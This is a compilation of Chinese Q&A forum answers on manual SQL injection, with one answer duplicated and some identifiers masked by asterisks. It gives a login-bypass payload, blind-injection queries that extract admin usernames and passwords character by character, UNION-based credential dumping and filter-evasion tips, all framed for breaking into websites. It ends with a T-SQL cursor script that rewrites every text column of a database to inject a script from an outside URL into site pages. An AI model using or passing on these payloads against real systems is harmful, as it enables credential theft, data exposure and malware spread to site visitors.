跪求SQL手工注入語句及原理
先舉個例子,你要登錄一個網站,上面讓你輸入用戶名字和密碼。
那么,假如你輸入的用戶名是 admin ,但是你不知道密碼,你就輸入了一個 1' OR '1' = '1 ,那么,你就提交了兩個參數給服務器。假如,服務器拿這兩個參數拼SQL語句:SELECT T.* FROM XXX_TABLE TWHERE *_ID = '/*param1*/'AND *RD = '/*param2*/'那么,你提交的兩個參數就使SQL文變成了:SELECT T.* FROM XXX_TABLE TWHERE *_ID = 'admin'AND *RD = '1' OR '1' = '1'那么,這個SQL原來的校驗功能就被你繞過去了,你的這種行為就稱之為SQL注入。
跪求SQL手工注入語句及原理
先舉個例子,你要登錄一個網站,上面讓你輸入用戶名字和密碼。
那么,假如你輸入的用戶名是 admin ,但是你不知道密碼,你就輸入了一個 1' OR '1' = '1 ,那么,你就提交了兩個參數給服務器。假如,服務器拿這兩個參數拼SQL語句:SELECT T.* FROM XXX_TABLE TWHERE *_ID = '/*param1*/'AND *RD = '/*param2*/'那么,你提交的兩個參數就使SQL文變成了:SELECT T.* FROM XXX_TABLE TWHERE *_ID = 'admin'AND *RD = '1' OR '1' = '1'那么,這個SQL原來的校驗功能就被你繞過去了,你的這種行為就稱之為SQL注入。
學習手工注入
先學會些sql查詢語句,然后去看看會產生sql注入漏洞的腳本是怎么造成慮參不嚴導致sql注入漏洞形成的(首先你大概要懂得每種腳本基礎的語法 接就是能大概看懂asp php jsp) 還有這些漏洞是如何被利用的(根據具體環境構造SQL語句) 要是會msf可以自己寫exploit以后看到同樣模版的就省事了。 另外多積累不同模版的漏洞。
現在網上的教程都是看了之后知其然不知其所以然 所以拿到實戰中多數沒效果建議還是從基礎學 不必太多 了解即可 以后在隨著學習的深入慢慢補充。
這就是我的經驗 希望對lz有幫助
是件--->;時間 打錯了= = 時間------------>;時間 打錯了……
如何手工注入網站漏洞
以下僅僅是個人思路,僅提供參考。
"骨灰級"電腦高手可以無視..
1.猜表名 and (select count(*) from[表])>0
2.猜字段 and (select count(字段) from 表)>0
3.猜字段長度 and (select top 1 len(admin) from admin)>0 >0,1,2,3,4,5。..
猜帳號長度
and (select top 1 len(password) from admin)>0 >0,1,2,3,4,5。..
猜密碼長度
4.猜字段的ASCII值(ACCESS) and (select top 1 asc(mid(admin,1,1)) from admin)>0
猜帳號的第一位
and (select top 1 asc(mid(admin,2,1)) from admin)>0
猜帳號的第二位
。。。。。..類推。
另外,如果網站采用的是通用的防止注入的代碼,比如在加'時,出現如下的對話筐,可以用注入中轉,
在本地搭建一個服務器,再拉啊D跑,在本地跑會很慢..
也可以用聯合查詢語句 and 1=2 union select 1,2,3,4******** form admin(表)
當然,前提是可以使用聯合查詢語句,帳號和密碼可以秒殺。。.
這只是思路.思路很重要..
很多高級注入的命令以及錯誤的處理方式,就不在此羅列了。.
如果需要入侵的站點很強,可以考慮跨站。
黑客 JSP手工注入時 order by 后無論加幾 結果都提示出錯是怎么回事
有可能是空點~
有一些假后門(注入點)
是高手網管自己留下的,實際沒意義
也就是說那種虛假注入點連不到數據庫里,或沒權訪問數據庫。
我曾經還查出來個GOOGLE的注入點,連表名都爆出來了,
但是數據訪問不了,后來咨詢大蝦,他們說就是這個假門的情況。
當然,也有其它可能:
1。你的瀏覽器過期了,或者不支持你要黑的網站
2。試試其它的語句,ORDER BY被排除了也說不定。
好像可以用SELECT UNION,不過我不是手工注入的高手,不太清楚這個兩個語句的異同。
如果真的是第二種可能,可以試試加點無用代碼,或大小寫并用,也許就可以過了。
希望有幫助,要是可以的話,交個朋友也不錯,現在學黑的人真的少了很多。
SQL注入語句
沒編什么碼就直接轉換成ascii就行了declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select *,* from sysobjects a,syscolumns b where *=* and *='u' and (*=99 or *=35 or *=231 or *=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+''''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor總體思想就是把你的html代碼里插入一段jsjs來自http://***。